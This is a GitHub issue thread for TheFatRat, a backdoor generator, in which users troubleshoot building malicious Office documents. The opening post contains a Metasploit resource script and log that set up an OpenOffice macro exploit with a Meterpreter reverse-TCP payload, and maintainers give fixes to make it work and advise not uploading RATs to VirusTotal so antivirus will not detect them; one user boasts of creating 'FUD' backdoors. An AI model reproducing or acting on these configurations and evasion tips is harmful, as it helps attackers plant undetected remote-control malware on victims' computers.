### ISSUE TITLE
Problem when creating Backdoor for Office with Microsploit 

### ISSUE THREAD

**Issue by Elements01** [Screetsec/TheFatRat#130]
Hi, 
i get an error when i try to create a office backdoor (option 5) for Mac/Linux.

here is the log file output:

**********************************************
*           Microsploit    Log               *
**********************************************
             Metepreter Data                  
----------------------------------------------
use exploit/multi/misc/openoffice_document_macro
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.2.101
set LPORT 4444
set FILENAME Test.odt
set BODY test
exploit
exit -y
----------------------------------------------
              Xterm Output                    
----------------------------------------------
[0m[36m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[0m

=[ [33mmetasploit v4.14.22-dev[0m ]
+ -- --=[ 1658 exploits - 947 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[1m[34m[*][0m Processing /root/Desktop/TheFatRat/temp/meterpreter.rc for ERB directives.
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> use exploit/multi/misc/openoffice_document_macro
[0mresource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> set PAYLOAD python/meterpreter/reverse_tcp
[0mPAYLOAD => python/meterpreter/reverse_tcp
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> set LHOST 192.168.2.101
[0mLHOST => 192.168.2.101
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> set LPORT 4444
[0mLPORT => 4444
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> set FILENAME Test.odt
[0mFILENAME => Test.odt
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> set BODY test
[0mBODY => test
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> exploit
[0m[1m[31m[-][0m Exploit failed: python/meterpreter/reverse_tcp is not a compatible payload.
resource (/root/Desktop/TheFatRat/temp/meterpreter.rc)> exit -y
mv: cannot stat '/root/.msf4/local/Test.odt': No such file or directory

**Comment by peterpt** [comment]
Thank you for letting us know .
I will give a look to it tomorrow .

**Comment by Patrickology** [comment]
I managed to create a .docm file which I tired to open but Windows Defender picked up on it..

![image](https://cloud.githubusercontent.com/assets/28252390/26714261/0e174666-4771-11e7-9d16-337ad34ec65f.png)

**Comment by peterpt** [comment]
that happens because people have the tendency to upload their rat files to virus total , which virus total share the infected file with AV companies .

**Comment by Screetsec** [comment]
@Elements01  Update metasploit module into latest version

**Comment by Patrickology** [comment]
that's dumb because you get a bis ass warning not to upload it to Virus Total! Can't fix stupid Peter..

**Comment by peterpt** [comment]
Yeah , we know , but people dont get it .
And then they get here writing that their rats are detected by AV .
About those detections there is nothing that we can do to avoid it .

**Comment by peterpt** [comment]
You were right about the bug in option5 in microsploit .
It looks that by default that exploit when loaded in msfconsole is set to windows machines
and if you want to compile the odt file with a python payload then the target must be set to 1 
like i show in this next picture .
![openoffice](https://cloud.githubusercontent.com/assets/7487321/26740355/31a09006-47a3-11e7-8d01-4849f09c4f5b.png)

Also the other payloads in that list are not compatible , for Linux only python payloads are now available .
I will fix it during this weekend .

**Comment by peterpt** [comment]
well , i had to approach this issue in a different way , however to make this change i need Edo to authorize me to upload the files .
New changes to fix that option in microsploit and other ones in same state .
https://youtu.be/2IHFyfKvwPg

**Comment by Screetsec** [comment]
pushed @peterpt it's great idea

**Comment by M-cyberwarrior** [comment]
Dear @Screetsec @peterpt, The same issue is faced by me.  Yesterday only, I upgraded my Kali-Linux (from version 2019) to the very latest version 2020.2 which is based on Gnome 3.30.2 (x64). It's a virtual machine in VMWare 15.

I was able to create FUD Backdoor easily, which was saved in Folder: /root/FatRat_Generated/
Then, I moved on to create backdoor for Office with Microsploit. I choose [2] The Microsoft Office Macro on Windows.
![image](https://user-images.githubusercontent.com/53998419/87227683-5116bf00-c3ba-11ea-9c6f-a4ba696f5626.png)

But it could not generate the output and returned "There was a problem in the creation of your Backdoor DOC check / root/TheFatRat/logs/msploit. log for more information about the error."

Log again pointed to the problem: 
![image](https://user-images.githubusercontent.com/53998419/87227817-e6b24e80-c3ba-11ea-96c1-3f329eaffd2e.png)

Kindly give me your guidance & instructions to solve this problem.

Soliciting your help,

With thanks,

Meena R.
